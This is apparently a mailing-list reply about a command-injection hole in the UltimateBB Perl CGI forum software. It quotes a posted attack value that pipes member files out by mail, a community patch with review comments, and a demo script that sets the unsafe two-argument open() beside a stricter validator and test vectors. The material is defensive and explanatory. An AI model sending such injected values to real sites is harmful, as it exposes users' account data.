According to the folks at UBB, the latest version, 5.43d, fixes this
vulnerability. Has anyone been able to verify if this is in fact correct?
Irwin
> -----Original Message-----
> From: Jordan Ritter [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, February 15, 2000 8:48 PM
> To: [EMAIL PROTECTED]
> Subject: Re: perl-cgi hole in UltimateBB by Infopop Corp.
>
>
> On Mon, 14 Feb 2000, Kevin Hillabolt wrote:
>
> # It works on the full version also...
> #
> # Little different syntax:
> # topic=012345.cgi|cat%20../Members/*|mail [EMAIL PROTECTED]|
> # (note the ../ on the Members. You have to go up a directory to get the
> # file. Maybe you could stop it via simple folder permissions??)
>
> Provided with no warranty. unescape() borrowed from the far superior
> CGI.pm. It appears to work, but I haven't checked it for completeness.
> The ubb scripts are a programming disaster, and pass around metachars and
> filenames through form parameters, making input validation difficult.
> The patch below selectively validates input based on the name of the
> variable we're validating (i.e. only certain variables are dangerous;
> others are just dumb and not a risk). It's better to try and validate at
> the top level than code review the source and try to patch every idiotic
> mistake that was made. At the very least, this stops the specific attack
> that was posted. There could be other holes that this doesn't cover, or
> alternative ways to carry out the same attack. Hopefully Infopop will get
> their act together soon.
>
> I can't believe they distribute this crap as commercial software.
> Actually, what I can't believe is how many people paid for it. God help
> us all.
>
>
> --jordan
>
>
> $ diff ubb_library.pl ubb_library.pl.orig
> 84,93d83
> < # unescape URL-encoded data
> < sub unescape {
> < shift() if ref($_[0]);
> < my $todecode = shift;
> < return undef unless defined($todecode);
> < $todecode =~ tr/+/ /; # pluses become spaces
> < $todecode =~ s/%([0-9a-fA-F]{2})/pack("c",hex($1))/ge;
> < return $todecode;
> < }
> <
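Review bot: this decodes `%XX` exactly once, and the checks in the later hunks accept `%` itself (it sits inside the space-to-`@` range of their class), so a doubly-encoded value such as `%257C` leaves here as `%7C` and passes; that is only safe if nothing downstream decodes the parameter a second time, which is worth confirming in the callers before relying on it. The line `shift() if ref($_[0]);` is CGI.pm's method-call convention and does nothing for the `&unescape($val)` calls this patch makes, so it can be dropped.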
> 1047a1038
> >
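Review bot: `1047a1038` only deletes a blank line and has nothing to do with the fix; drop it so the patch stays limited to the validation change.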
> 1112,1120d1102
> < # clean input
> < if ($key =~ /^(forum|topic|number|replynum)$/i) {
> < my($newval) = &unescape($val);
> <
> < if ($newval !~ /^([ -\@\w.]+)$/) {
> < $val = "bad_input";
> < }
> < }
> <
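Review bot: the character class in `if ($newval !~ /^([ -\@\w.]+)$/) {` is far wider than it reads: the range from space (0x20) to `@` (0x40) includes `/`, `;`, `&`, `$`, `<`, `>`, `*`, `(`, `)`, `%` and both quote characters, so of the posted attack only the `|` is stopped and `../Members/*` still passes, as does any other traversal to a file the scripts will open. Restrict it to what a topic or forum id actually contains (`/^[\w.]+\z/` or similar; admit `/` only if a path component is really passed here, and then reject `..` explicitly), and anchor with `\z` rather than `$`, which also matches before a trailing newline. Substituting `bad_input` lets the script carry on and try to open a file of that name; returning an explicit error would make failed validation visible instead of silently changing the request.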
> 1266,1284d1247
> <
> < my(@out);
> < foreach $row (@in) {
> < my($name,$value) = split ("=", $row);
> <
> < if ($name =~ /^(forum|topic|number|replynum)$/i) {
> < my($newvalue) = &unescape($value);
> <
> < if ($newvalue !~ /^([ -\@\w.]+)$/) {
> < $value = "bad_input";
> < }
> <
> < push @out, "$name=$value";
> < } else {
> < push @out, $row;
> < }
> < }
> < @in = @out;
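Review bot: `split ("=", $row)` has no field limit, so a value containing a literal `=` loses everything after it when the row is rebuilt as `"$name=$value"`; use `split(/=/, $row, 2)`. `foreach $row` iterates a package global; give it a lexical (`foreach my $row (@in)`). This block repeats the name list and the regex from the earlier hunk, so the same over-wide class and `$` anchor apply here too; factor both sites into one sub such as `clean_param($name, $value)` so the two copies cannot drift apart when the class is tightened.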
>
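As an added example, not code from UBB, Infopop or the patch quoted above, the same idea written as a stand-alone Perl script: it shows why the posted `topic=...|` value is a command when it reaches a two-argument open(), and a validator stricter than the patch's character class that also rejects the `../Members/` traversal. The directory name, the parameter values, the address `x@example.com` and the expected results are all constructed for the demonstration.

```perl
#!/usr/bin/perl
# Added example, not UBB's code: two-argument open() beside a validated open.
use strict;
use warnings;
use Fcntl qw(O_RDONLY);

# Decode one URL-encoded form value once (same idea as the patch's unescape()).
sub unescape {
    my ($s) = @_;
    return undef unless defined $s;
    $s =~ tr/+/ /;                                   # '+' is a space
    $s =~ s/%([0-9a-fA-F]{2})/chr(hex($1))/ge;       # %XX -> byte
    return $s;
}

# Accept only a single path component: letters, digits, '_' and '.',
# not starting with '.', at most 64 bytes.  Because '/' is excluded
# there is no way to spell "../Members", and because the anchor is \z
# (not $) a value with a trailing newline is rejected too.
sub is_safe_name {
    my ($name) = @_;
    return 0 unless defined $name;
    return 0 if length($name) > 64;
    return $name =~ /\A[A-Za-z0-9_][A-Za-z0-9_.]*\z/ ? 1 : 0;
}

# The vulnerable idiom (shown, never called): with two arguments, open()
# treats a string ending in '|' as a command to run and read from, so
# $topic = "012345.cgi|cat ../Members/*|mail x@example.com|" executes
# the cat and mail commands under the web server's user.
sub open_topic_unsafe {
    my ($dir, $topic) = @_;
    open(my $fh, "$dir/$topic") or return undef;     # DO NOT USE
    return $fh;
}

# Hardened form: decode, validate the decoded value, then sysopen(),
# which never interprets '|', '<' or '>' in the file name.
sub open_topic_safe {
    my ($dir, $raw) = @_;
    my $topic = unescape($raw);
    return undef unless is_safe_name($topic);
    sysopen(my $fh, "$dir/$topic", O_RDONLY) or return undef;
    return $fh;
}

# Constructed test vectors; the first is the syntax posted in the thread
# (address replaced).  1 = should be accepted, 0 = should be rejected.
my %cases = (
    '012345.cgi|cat%20../Members/*|mail%20x@example.com|' => 0,  # command injection
    '../Members/000001.cgi'                               => 0,  # traversal (no '|' to catch)
    '%2e%2e/Members/000001.cgi'                           => 0,  # encoded traversal
    '012345.cgi%0a'                                       => 0,  # trailing newline
    '.htaccess'                                           => 0,  # dot-file
    '012345.cgi'                                          => 1,  # a real topic file
);

for my $raw (sort keys %cases) {
    my $ok = is_safe_name(unescape($raw));
    printf "%-52s %s\n", $raw, $ok ? 'accepted' : 'rejected';
    die "validator disagrees with expectation for '$raw'\n"
        unless $ok == $cases{$raw};
}
```

Run it with `perl`; it prints one line per vector and dies if any classification is wrong. On Perl 5.6 or later, the three-argument form `open(my $fh, '<', "$dir/$topic")` removes the pipe interpretation just as `sysopen` does, but neither replaces the name check, which is what stops the `../` traversal that the patch's class lets through.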